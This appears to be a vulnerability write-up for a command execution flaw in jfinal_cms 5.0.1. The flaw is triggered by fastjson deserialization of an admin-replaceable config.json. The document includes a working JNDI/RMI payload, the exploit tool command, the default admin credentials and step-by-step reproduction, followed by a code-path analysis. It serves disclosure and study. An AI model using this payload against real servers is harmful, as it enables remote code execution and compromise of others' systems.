Administrator Interface Command Execution Vulnerability

[sp4zcmd]

Vulnerability summary

A command execution vulnerability exists in jfinal_cms 5.0.1

JDK version requirements：

• JDK version used based on RMI<=6u141, 7u131, 8u121
• JDK version used based on LDAP<=6u211, 7u201, 8u191.

jfinal_cms version：5.0.1

fastjson version：1.2.28

vulnerability recurrence

JDK version used in the test: JDK8u101

Run the tool on kali, start rmi and ldap services

https://github.com/feihong-cs/JNDIExploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"

replace rmi or ldap address in payload:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.248.128:1099/6dxg2x",
        "autoCommit":true
    }
}

Create the config.json file and copy the payload in

Log in to the Backstage management system, select template management

default password:admin/admin123

Click config.json

Click Replace file

Replace with the config.json file containing the payload just created

Visit /ueditor, execute the command to pop up the calculator

http://localhost:8080/jfinal_cms/ueditor

Vulnerability analysis

com.jflyfox.component.controller.Ueditor

The ActionEnter class is instantiated in the index method of the /ueditor route

com.baidu.ueditor.ActionEnter#ActionEnter

The ConfigManager class is instantiated in the constructor of the ActionEnter class

com.baidu.ueditor.ConfigManager#ConfigManager

The construction method of ConfigManager calls initEnv()

com.baidu.ueditor.ConfigManager#initEnv

Call JSONObject.parseObject to parse the file content, and the file content here is controllable, just replace the file content with the payload.

com.baidu.ueditor.ConfigManager

The file comes from WEB-INF/classes/config.json. With any file upload vulnerability in the background, this file can be replaced with a file containing the payload to trigger fastjson deserialization